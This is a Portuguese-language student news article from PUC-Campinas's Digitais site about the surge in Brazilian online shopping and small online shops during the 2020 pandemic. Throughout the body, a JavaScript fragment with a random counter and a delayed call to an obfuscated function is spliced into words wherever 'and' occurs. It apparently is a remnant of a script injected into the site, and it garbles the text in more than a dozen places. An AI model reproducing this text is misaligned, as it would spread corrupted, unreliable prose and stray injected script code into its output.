Destaque

7,3 mi de brasileiros se rendem ao comércio digital

Isabela Schmidt, dona da Tie You, mostra em ensaio a camiseta de nova coleção.
(Foto: Arquivo Pessoal)

Isabela Schmidt integra grupo de mais 3 milhões de empreendedores com lojas online

 

 

 

Por: Marília Koga

De acordo com a pesquisa publicada em agosto pela Ebit/Nielsen, 7.3 milhões de brasileiros fizeram sua primeira compra on-line durante o 1º semestre de 2020. O motivo deste crescimento para Roberto Brito de Carvalho, professor de economia da PUC-Campinas está ligado com o fechamento das lojas físicas e a necessidade de continuar consumindo, obrigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os públicos a renderem-se ao comércio digital. “Nos meses de março a maio, a gente teve uma postura mais contundente no processo de permanecer em isolamento e o público passou a fazer compras utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a tecnologia”, ressalta o economista.

Giuliana Erbetta, estudante de relações públicas é um dos exemplos citados pelo

Perfil online na rede social Instagram da loja Love In Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy.
(Foto: Instagram)

professor. Por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia foi obrigada a fazer compras on-line. “Eu nunca tinha comprado online antes, sempre tive uma certa desconfiança, mas na quarentena, minhas irmãs me convenceram e me indicaram sites confiáveis”, disse.  Essa mudança de hábitos não afetou apenas os consumidores, mas também lojistas e empreendedores. Segundo a pesquisa feita pelo BigData e Paypal, o Brasil possui hoje em média 1,3 milhão de lojas online, sendo a 52,63% pequenos empreendedores e destes a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria (92%) não possuem uma sede física, como é o caso da Loja Love In Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy, de doces caseiros, e da loja Tie You, de peças em Tie Dye.

 

Anna Julia, estudante de psicologia, disse ter visto na quarentena, uma oportunidade para investir nas vendas online. “A ideia surgiu em conjunto com uma amiga, Gabriela Almeida. a mãe dela, Rose Almeida, sempre fez doces, mas nunca no sentindo de comércio. Achamos que a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia era o momento propício, pois queríamos ter uma renda extra.”

Isabela Schmidt, aluna de Artes Visuais, também achou propício aproveitar o momento para criar sua loja online de peças de roupas Tie Dye, que é uma técnica de tingimento artístico de tecidos. A dona do E-commerce Tie You, conta que já fazia um tempo que tinha a ideia em mente, pois não encontrava roupas do estilo Tie Dye, para vender em Shoppings, e começou a criar suas próprias peças, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando decidiu comercializas.
A aluna de artes visuais conta também qual é a maior vantagem de vender de forma online. “Eu não pretendo ter uma loja física ou vender pessoalmente, e tem sido bacana a experiência, porque o retorno é muito rápido, e as pessoas ficam sabendo por indicação e por pequenos investimentos que faço em minhas publicações, e daí ganho vários seguidores novos, então essa forma de conseguir mais cliente é mais fácil estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando online, ao meu ver.”

Uma pesquisa feita pela Ebit/Nielsen com intenção de entender melhor os novos consumidores de E-commerces, mostram que 77% dos consumidores optaram e devem continuar a comprar de forma online, por conta por exemplo, de não necessitar sair de casa. E os motivos vão além, 22% dos entrevistados, levantaram que outro diferencial e benefício em comprar usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Internet, são os diversos meios de pagamentos.

Mesmo com a reabertura do comércio em diversas partes do Brasil, o professor Roberto Brito diz acreditar que ainda exista espaço suficiente para que os e-commerces no Brasil continuem prosperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, principalmente por conta das mudanças drásticas no comportamento dos consumidores brasileiros que o isolamento causou. “Muita gente que já não gostava de ir ao mercado, não tinha a disposição em ir em farmácias, padarias, e então que conseguiram converter isso em hábitos padronizado do ponto de vista tecnológico, ou seja a partir de compras on-line, eliminaram uma dor de cabeça, um desconforto.”

 

Orientação Profa. Rose Bars

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.